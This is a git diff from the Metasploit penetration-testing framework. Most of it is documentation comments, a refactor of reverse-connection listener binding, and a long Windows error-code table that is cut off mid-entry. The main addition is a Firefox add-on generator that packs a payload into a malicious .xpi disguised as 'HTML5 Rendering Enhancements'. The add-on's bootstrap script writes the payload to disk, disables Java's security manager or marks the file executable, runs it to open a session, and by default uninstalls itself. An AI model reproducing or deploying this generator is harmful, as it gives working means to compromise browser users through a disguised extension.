[Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_evasion_options(mod, indent = '') output = '' pad = indent @@ -358,6 +390,11 @@ class ReadableText return output end + # Dumps the references associated with the supplied module. + # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_references(mod, indent = '') output = '' @@ -372,9 +409,13 @@ class ReadableText output end - # # Dumps the contents of a datastore. # + # @param name [String] displayed as the table header. + # @param ds [Msf::DataStore] the DataStore to dump. + # @param indent [Integer] the indentation size. + # @param col [Integer] the column width. + # @return [String] the formatted DataStore contents. def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -392,9 +433,17 @@ class ReadableText return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n" end - # # Dumps the list of active sessions. # + # @param framework [Msf::Framework] the framework to dump. + # @param opts [Hash] the options to dump with. + # @option opts :session_ids [Array] the list of sessions to dump (no + # effect). + # @option opts :verbose [Boolean] gives more information if set to + # true. + # @option opts :indent [Integer] set the indentation amount. + # @option opts :col [Integer] the column wrap width. + # @return [String] the formatted list of sessions. def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false @@ -437,12 +486,14 @@ class ReadableText return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n" end - # # Dumps the list of running jobs. # - # If verbose is true, also prints the payload, LPORT, URIPATH and start - # time, if they exist, for each job. - # + # @param framework [Msf::Framework] the framework. + # @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH + # and start time, if they exist, for each job. + # @param indent [Integer] the indentation amount. + # @param col [Integer] the column wrap width. + # @return [String] the formatted list of running jobs. def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap) columns = [ 'Id', 'Name' ] @@ -479,10 +530,13 @@ class ReadableText return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n" end - # # Jacked from Ernest Ellingson , modified # a bit to add indention # + # @param str [String] the string to wrap. + # @param indent [Integer] the indentation amount. + # @param col [Integer] the column wrap width. + # @return [String] the wrapped string. def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap) return Rex::Text.wordwrap(str, indent, col) end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 1da0a5a5a1..d1bd31a508 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm' # WebApp require 'msf/core/exploit/web' +# Firefox addons +require 'msf/core/exploit/remote/firefox_addon_generator' + require 'msf/core/exploit/remote/browser_exploit_server' diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index d9c94c5b78..87f4f82ebd 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -92,6 +92,15 @@ module Msf "#{get_resource.chomp("/")}/#{@exploit_receiver_page}" end + # + # Returns the absolute URL to the module's resource that points to on_request_exploit + # + # @return [String] absolute URI to the exploit page + # + def get_module_uri + "#{get_uri.chomp("/")}/#{@exploit_receiver_page}" + end + # # Returns the current target # @@ -166,8 +175,10 @@ module Msf # Special keys to ignore because the script registers this as [:activex] = true or false next if k == :clsid or k == :method - if v.class == Regexp + if v.is_a? Regexp bad_reqs << k if profile[k.to_sym] !~ v + elsif v.is_a? Proc + bad_reqs << k unless v.call(profile[k.to_sym]) else bad_reqs << k if profile[k.to_sym] != v end diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb new file mode 100644 index 0000000000..85d3d879db --- /dev/null +++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb @@ -0,0 +1,174 @@ +# -*- coding: binary -*- + +### +# +# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi +# addon that will gain a session. +# +### + +module Msf +module Exploit::Remote::FirefoxAddonGenerator + + # Add in the supported datastore options + def initialize( info = {} ) + super(update_info(info, + 'Platform' => %w{ java linux osx solaris win }, + 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ] + ], + 'DefaultTarget' => 1 + )) + + register_options( [ + OptString.new('ADDONNAME', [ true, + "The addon name.", + "HTML5 Rendering Enhancements" + ]), + OptBool.new('AutoUninstall', [ true, + "Automatically uninstall the addon after payload execution", + true + ]) + ], self.class) + end + + # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the + # 'application/x-xpinstall' MIME type + def generate_addon_xpi + if target.name == 'Generic (Java Payload)' + jar = p.encoded_jar + jar.build_manifest(:main_class => "metasploit.Payload") + payload_file = jar.pack + payload_name='payload.jar' + payload_script=%q| + var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java + java.lang.System.setSecurityManager(null); + var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]); + var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]); + m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]); + | + else + payload_file = generate_payload_exe + payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe' + payload_script=%q| + var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); + process.init(tmp); + process.run(false,[],0); + | + if target.name != 'Windows x86 (Native Payload)' + payload_script = %q| + var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); + chmod.initWithPath("/bin/chmod"); + var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); + process.init(chmod); + process.run(true, ["+x", tmp.path], 2); + | + payload_script + end + end + + zip = Rex::Zip::Archive.new + xpi_guid = Rex::Text.rand_guid + bootstrap_script = %q| +function startup(data, reason) { + var file = Components.classes["@mozilla.org/file/directory_service;1"]. + getService(Components.interfaces.nsIProperties). + get("ProfD", Components.interfaces.nsIFile); + file.append("extensions"); + | + bootstrap_script << %Q|xpi_guid="#{xpi_guid}";| + bootstrap_script << %Q|payload_name="#{payload_name}";| + bootstrap_script << %q| + file.append(xpi_guid); + file.append(payload_name); + var tmp = Components.classes["@mozilla.org/file/directory_service;1"]. + getService(Components.interfaces.nsIProperties). + get("TmpD", Components.interfaces.nsIFile); + tmp.append(payload_name); + tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666); + file.copyTo(tmp.parent, tmp.leafName); + | + bootstrap_script << payload_script + + if (datastore['AutoUninstall']) + bootstrap_script << %q| + try { // Fx < 4.0 + Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); + } catch (e) {} + try { // Fx 4.0 and later + Components.utils.import("resource://gre/modules/AddonManager.jsm"); + AddonManager.getAddonByID(xpi_guid, function(addon) { + addon.uninstall(); + }); + } catch (e) {} + | + end + + bootstrap_script << "}" + + zip.add_file('bootstrap.js', bootstrap_script) + zip.add_file(payload_name, payload_file) + zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n") + zip.add_file('install.rdf', %Q| + + + #{xpi_guid} + #{datastore['ADDONNAME']} + 1.0 + true + true + + + toolkit@mozilla.org + 1.0 + * + + + + + {ec8030f7-c20a-464f-9b0e-13a3a9e97384} + 1.0 + * + + + +|) + zip.add_file('overlay.xul', %q| + + +|) + zip + end +end +end diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 583de796e2..94e9376fae 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -83,23 +83,10 @@ module ReverseHttp # addresses. # def full_uri - unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? - lhost = datastore['HIDDENHOST'] - else - lhost = datastore['LHOST'] - end - if lhost.empty? or lhost == "0.0.0.0" or lhost == "::" - lhost = Rex::Socket.source_address - end - lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + addrs = bind_address + local_port = bind_port scheme = (ssl?) ? "https" : "http" - unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 - uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/" - else - uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/" - end - - uri + "#{scheme}://#{addrs[0]}:#{local_port}/" end # @@ -163,6 +150,7 @@ module ReverseHttp OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]), OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '

It works!

' ]) ], Msf::Handler::ReverseHttp) end @@ -186,17 +174,13 @@ module ReverseHttp comm = nil end - # Determine where to bind the HTTP(S) server to - bindaddrs = ipv6 ? '::' : '0.0.0.0' - - if not datastore['ReverseListenerBindAddress'].to_s.empty? - bindaddrs = datastore['ReverseListenerBindAddress'] - end + local_port = bind_port + addrs = bind_address # Start the HTTPS server service on this host/port self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, - datastore['LPORT'].to_i, - bindaddrs, + local_port, + addrs[0], ssl?, { 'Msf' => framework, @@ -413,6 +397,33 @@ protected obj.service.close_client( cli ) end +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 10ec427f6b..1cc216f6d6 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb @@ -42,13 +42,17 @@ module ReverseHttpsProxy OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]), OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]), - OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]), - OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]), OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]), OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]), OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"]) ], Msf::Handler::ReverseHttpsProxy) + register_advanced_options( + [ + OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]) + ], Msf::Handler::ReverseHttpsProxy) + end end diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index fb7b042660..62d220ade3 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -53,8 +53,9 @@ module ReverseTcp [ OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), - OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]), + OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]) ], Msf::Handler::ReverseTcp) @@ -72,13 +73,6 @@ module ReverseTcp end ex = false - # Switch to IPv6 ANY address if the LHOST is also IPv6 - addr = Rex::Socket.resolv_nbo(datastore['LHOST']) - # First attempt to bind LHOST. If that fails, the user probably has - # something else listening on that interface. Try again with ANY_ADDR. - any = (addr.length == 4) ? "0.0.0.0" : "::0" - - addrs = [ Rex::Socket.addr_ntoa(addr), any ] comm = datastore['ReverseListenerComm'] if comm.to_s == "local" @@ -87,19 +81,15 @@ module ReverseTcp comm = nil end - if not datastore['ReverseListenerBindAddress'].to_s.empty? - # Only try to bind to this specific interface - addrs = [ datastore['ReverseListenerBindAddress'] ] + local_port = bind_port + addrs = bind_address - # Pick the right "any" address if either wildcard is used - addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") - end addrs.each { |ip| begin self.listener_sock = Rex::Socket::TcpServer.create( 'LocalHost' => ip, - 'LocalPort' => datastore['LPORT'].to_i, + 'LocalPort' => local_port, 'Comm' => comm, 'Context' => { @@ -119,11 +109,11 @@ module ReverseTcp via = "" end - print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}") + print_status("Started reverse handler on #{ip}:#{local_port} #{via}") break rescue ex = $! - print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + print_error("Handler failed to bind to #{ip}:#{local_port}") end } raise ex if (ex) @@ -140,7 +130,8 @@ module ReverseTcp # Starts monitoring for an inbound connection. # def start_handler - self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) { + local_port = bind_port + self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) { client = nil begin @@ -159,7 +150,7 @@ module ReverseTcp end while true } - self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) { + self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) { while true client = self.handler_queue.pop begin @@ -241,6 +232,31 @@ module ReverseTcp protected + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + attr_accessor :listener_sock # :nodoc: attr_accessor :listener_thread # :nodoc: attr_accessor :handler_thread # :nodoc: diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb index 61a1ae8b4a..e469054d65 100644 --- a/lib/msf/core/handler/reverse_tcp_ssl.rb +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb @@ -43,7 +43,9 @@ module ReverseTcpSsl super register_advanced_options( [ - OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']) + OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), + OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]) ], Msf::Handler::ReverseTcpSsl) end @@ -59,13 +61,6 @@ module ReverseTcpSsl end ex = false - # Switch to IPv6 ANY address if the LHOST is also IPv6 - addr = Rex::Socket.resolv_nbo(datastore['LHOST']) - # First attempt to bind LHOST. If that fails, the user probably has - # something else listening on that interface. Try again with ANY_ADDR. - any = (addr.length == 4) ? "0.0.0.0" : "::0" - - addrs = [ Rex::Socket.addr_ntoa(addr), any ] comm = datastore['ReverseListenerComm'] if comm.to_s == "local" @@ -74,20 +69,16 @@ module ReverseTcpSsl comm = nil end - if not datastore['ReverseListenerBindAddress'].to_s.empty? - # Only try to bind to this specific interface - addrs = [ datastore['ReverseListenerBindAddress'] ] + local_port = bind_port + addrs = bind_address - # Pick the right "any" address if either wildcard is used - addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") - end addrs.each { |ip| begin comm.extend(Rex::Socket::SslTcp) self.listener_sock = Rex::Socket::SslTcpServer.create( - 'LocalHost' => datastore['LHOST'], - 'LocalPort' => datastore['LPORT'].to_i, + 'LocalHost' => ip, + 'LocalPort' => local_port, 'Comm' => comm, 'SSLCert' => datastore['SSLCert'], 'Context' => @@ -108,16 +99,43 @@ module ReverseTcpSsl via = "" end - print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}") + print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}") break rescue ex = $! - print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + print_error("Handler failed to bind to #{ip}:#{local_port}") end } raise ex if (ex) end +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end end diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index e37f4eed70..36acc612ad 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -449,6 +449,9 @@ class Module ch = self.compat['Nop'] elsif (mod.type == MODULE_PAYLOAD) ch = self.compat['Payload'] + if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat'] + ch = ch.merge(self.target['Payload']['Compat']) + end else return true end diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb index a504e65670..af386267c3 100644 --- a/lib/msf/core/post/windows.rb +++ b/lib/msf/core/post/windows.rb @@ -1,5 +1,6 @@ module Msf::Post::Windows + require 'msf/core/post/windows/error' require 'msf/core/post/windows/accounts' require 'msf/core/post/windows/cli_parse' require 'msf/core/post/windows/eventlog' diff --git a/lib/msf/core/post/windows/error.rb b/lib/msf/core/post/windows/error.rb new file mode 100644 index 0000000000..6557d729a1 --- /dev/null +++ b/lib/msf/core/post/windows/error.rb @@ -0,0 +1,2531 @@ + +module Msf::Post::Windows::Error + SUCCESS = 0x0000 + INVALID_FUNCTION = 0x0001 + FILE_NOT_FOUND = 0x0002 + PATH_NOT_FOUND = 0x0003 + TOO_MANY_OPEN_FILES = 0x0004 + ACCESS_DENIED = 0x0005 + INVALID_HANDLE = 0x0006 + ARENA_TRASHED = 0x0007 + NOT_ENOUGH_MEMORY = 0x0008 + INVALID_BLOCK = 0x0009 + BAD_ENVIRONMENT = 0x000A + BAD_FORMAT = 0x000B + INVALID_ACCESS = 0x000C + INVALID_DATA = 0x000D + OUTOFMEMORY = 0x000E + INVALID_DRIVE = 0x000F + CURRENT_DIRECTORY = 0x0010 + NOT_SAME_DEVICE = 0x0011 + NO_MORE_FILES = 0x0012 + WRITE_PROTECT = 0x0013 + BAD_UNIT = 0x0014 + NOT_READY = 0x0015 + BAD_COMMAND = 0x0016 + CRC = 0x0017 + BAD_LENGTH = 0x0018 + SEEK = 0x0019 + NOT_DOS_DISK = 0x001A + SECTOR_NOT_FOUND = 0x001B + OUT_OF_PAPER = 0x001C + WRITE_FAULT = 0x001D + READ_FAULT = 0x001E + GEN_FAILURE = 0x001F + SHARING_VIOLATION = 0x0020 + LOCK_VIOLATION = 0x0021 + WRONG_DISK = 0x0022 + SHARING_BUFFER_EXCEEDED = 0x0024 + HANDLE_EOF = 0x0026 + HANDLE_DISK_FULL = 0x0027 + NOT_SUPPORTED = 0x0032 + REM_NOT_LIST = 0x0033 + DUP_NAME = 0x0034 + BAD_NETPATH = 0x0035 + NETWORK_BUSY = 0x0036 + DEV_NOT_EXIST = 0x0037 + TOO_MANY_CMDS = 0x0038 + ADAP_HDW_ERR = 0x0039 + BAD_NET_RESP = 0x003A + UNEXP_NET_ERR = 0x003B + BAD_REM_ADAP = 0x003C + PRINTQ_FULL = 0x003D + NO_SPOOL_SPACE = 0x003E + PRINT_CANCELLED = 0x003F + NETNAME_DELETED = 0x0040 + NETWORK_ACCESS_DENIED = 0x0041 + BAD_DEV_TYPE = 0x0042 + BAD_NET_NAME = 0x0043 + TOO_MANY_NAMES = 0x0044 + TOO_MANY_SESS = 0x0045 + SHARING_PAUSED = 0x0046 + REQ_NOT_ACCEP = 0x0047 + REDIR_PAUSED = 0x0048 + FILE_EXISTS = 0x0050 + CANNOT_MAKE = 0x0052 + FAIL_I24 = 0x0053 + OUT_OF_STRUCTURES = 0x0054 + ALREADY_ASSIGNED = 0x0055 + INVALID_PASSWORD = 0x0056 + INVALID_PARAMETER = 0x0057 + NET_WRITE_FAULT = 0x0058 + NO_PROC_SLOTS = 0x0059 + TOO_MANY_SEMAPHORES = 0x0064 + EXCL_SEM_ALREADY_OWNED = 0x0065 + SEM_IS_SET = 0x0066 + TOO_MANY_SEM_REQUESTS = 0x0067 + INVALID_AT_INTERRUPT_TIME = 0x0068 + SEM_OWNER_DIED = 0x0069 + SEM_USER_LIMIT = 0x006A + DISK_CHANGE = 0x006B + DRIVE_LOCKED = 0x006C + BROKEN_PIPE = 0x006D + OPEN_FAILED = 0x006E + BUFFER_OVERFLOW = 0x006F + DISK_FULL = 0x0070 + NO_MORE_SEARCH_HANDLES = 0x0071 + INVALID_TARGET_HANDLE = 0x0072 + INVALID_CATEGORY = 0x0075 + INVALID_VERIFY_SWITCH = 0x0076 + BAD_DRIVER_LEVEL = 0x0077 + CALL_NOT_IMPLEMENTED = 0x0078 + SEM_TIMEOUT = 0x0079 + INSUFFICIENT_BUFFER = 0x007A + INVALID_NAME = 0x007B + INVALID_LEVEL = 0x007C + NO_VOLUME_LABEL = 0x007D + MOD_NOT_FOUND = 0x007E + PROC_NOT_FOUND = 0x007F + WAIT_NO_CHILDREN = 0x0080 + CHILD_NOT_COMPLETE = 0x0081 + DIRECT_ACCESS_HANDLE = 0x0082 + NEGATIVE_SEEK = 0x0083 + SEEK_ON_DEVICE = 0x0084 + IS_JOIN_TARGET = 0x0085 + IS_JOINED = 0x0086 + IS_SUBSTED = 0x0087 + NOT_JOINED = 0x0088 + NOT_SUBSTED = 0x0089 + JOIN_TO_JOIN = 0x008A + SUBST_TO_SUBST = 0x008B + JOIN_TO_SUBST = 0x008C + SUBST_TO_JOIN = 0x008D + BUSY_DRIVE = 0x008E + SAME_DRIVE = 0x008F + DIR_NOT_ROOT = 0x0090 + DIR_NOT_EMPTY = 0x0091 + IS_SUBST_PATH = 0x0092 + IS_JOIN_PATH = 0x0093 + PATH_BUSY = 0x0094 + IS_SUBST_TARGET = 0x0095 + SYSTEM_TRACE = 0x0096 + INVALID_EVENT_COUNT = 0x0097 + TOO_MANY_MUXWAITERS = 0x0098 + INVALID_LIST_FORMAT = 0x0099 + LABEL_TOO_LONG = 0x009A + TOO_MANY_TCBS = 0x009B + SIGNAL_REFUSED = 0x009C + DISCARDED = 0x009D + NOT_LOCKED = 0x009E + BAD_THREADID_ADDR = 0x009F + BAD_ARGUMENTS = 0x00A0 + BAD_PATHNAME = 0x00A1 + SIGNAL_PENDING = 0x00A2 + MAX_THRDS_REACHED = 0x00A4 + LOCK_FAILED = 0x00A7 + BUSY = 0x00AA + CANCEL_VIOLATION = 0x00AD + ATOMIC_LOCKS_NOT_SUPPORTED = 0x00AE + INVALID_SEGMENT_NUMBER = 0x00B4 + INVALID_ORDINAL = 0x00B6 + ALREADY_EXISTS = 0x00B7 + INVALID_FLAG_NUMBER = 0x00BA + SEM_NOT_FOUND = 0x00BB + INVALID_STARTING_CODESEG = 0x00BC + INVALID_STACKSEG = 0x00BD + INVALID_MODULETYPE = 0x00BE + INVALID_EXE_SIGNATURE = 0x00BF + EXE_MARKED_INVALID = 0x00C0 + BAD_EXE_FORMAT = 0x00C1 + ITERATED_DATA_EXCEEDS_64k = 0x00C2 + INVALID_MINALLOCSIZE = 0x00C3 + DYNLINK_FROM_INVALID_RING = 0x00C4 + IOPL_NOT_ENABLED = 0x00C5 + INVALID_SEGDPL = 0x00C6 + AUTODATASEG_EXCEEDS_64k = 0x00C7 + RING2SEG_MUST_BE_MOVABLE = 0x00C8 + RELOC_CHAIN_XEEDS_SEGLIM = 0x00C9 + INFLOOP_IN_RELOC_CHAIN = 0x00CA + ENVVAR_NOT_FOUND = 0x00CB + NO_SIGNAL_SENT = 0x00CD + FILENAME_EXCED_RANGE = 0x00CE + RING2_STACK_IN_USE = 0x00CF + META_EXPANSION_TOO_LONG = 0x00D0 + INVALID_SIGNAL_NUMBER = 0x00D1 + THREAD_1_INACTIVE = 0x00D2 + LOCKED = 0x00D4 + TOO_MANY_MODULES = 0x00D6 + NESTING_NOT_ALLOWED = 0x00D7 + EXE_MACHINE_TYPE_MISMATCH = 0x00D8 + EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x00D9 + EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x00DA + FILE_CHECKED_OUT = 0x00DC + CHECKOUT_REQUIRED = 0x00DD + BAD_FILE_TYPE = 0x00DE + FILE_TOO_LARGE = 0x00DF + FORMS_AUTH_REQUIRED = 0x00E0 + VIRUS_INFECTED = 0x00E1 + VIRUS_DELETED = 0x00E2 + PIPE_LOCAL = 0x00E5 + BAD_PIPE = 0x00E6 + PIPE_BUSY = 0x00E7 + NO_DATA = 0x00E8 + PIPE_NOT_CONNECTED = 0x00E9 + MORE_DATA = 0x00EA + VC_DISCONNECTED = 0x00F0 + INVALID_EA_NAME = 0x00FE + EA_LIST_INCONSISTENT = 0x00FF + WAIT_TIMEOUT = 0x0102 + NO_MORE_ITEMS = 0x0103 + CANNOT_COPY = 0x010A + DIRECTORY = 0x010B + EAS_DIDNT_FIT = 0x0113 + EA_FILE_CORRUPT = 0x0114 + EA_TABLE_FULL = 0x0115 + INVALID_EA_HANDLE = 0x0116 + EAS_NOT_SUPPORTED = 0x011A + NOT_OWNER = 0x0120 + TOO_MANY_POSTS = 0x012A + PARTIAL_COPY = 0x012B + OPLOCK_NOT_GRANTED = 0x012C + INVALID_OPLOCK_PROTOCOL = 0x012D + DISK_TOO_FRAGMENTED = 0x012E + DELETE_PENDING = 0x012F + INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x0130 + SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x0131 + SECURITY_STREAM_IS_INCONSISTENT = 0x0132 + INVALID_LOCK_RANGE = 0x0133 + IMAGE_SUBSYSTEM_NOT_PRESENT = 0x0134 + NOTIFICATION_GUID_ALREADY_DEFINED = 0x0135 + MR_MID_NOT_FOUND = 0x013D + SCOPE_NOT_FOUND = 0x013E + FAIL_NOACTION_REBOOT = 0x015E + FAIL_SHUTDOWN = 0x015F + FAIL_RESTART = 0x0160 + MAX_SESSIONS_REACHED = 0x0161 + THREAD_MODE_ALREADY_BACKGROUND = 0x0190 + THREAD_MODE_NOT_BACKGROUND = 0x0191 + PROCESS_MODE_ALREADY_BACKGROUND = 0x0192 + PROCESS_MODE_NOT_BACKGROUND = 0x0193 + INVALID_ADDRESS = 0x01E7 + USER_PROFILE_LOAD = 0x01F4 + ARITHMETIC_OVERFLOW = 0x0216 + PIPE_CONNECTED = 0x0217 + PIPE_LISTENING = 0x0218 + VERIFIER_STOP = 0x0219 + ABIOS_ERROR = 0x021A + WX86_WARNING = 0x021B + WX86_ERROR = 0x021C + TIMER_NOT_CANCELED = 0x021D + UNWIND = 0x021E + BAD_STACK = 0x021F + INVALID_UNWIND_TARGET = 0x0220 + INVALID_PORT_ATTRIBUTES = 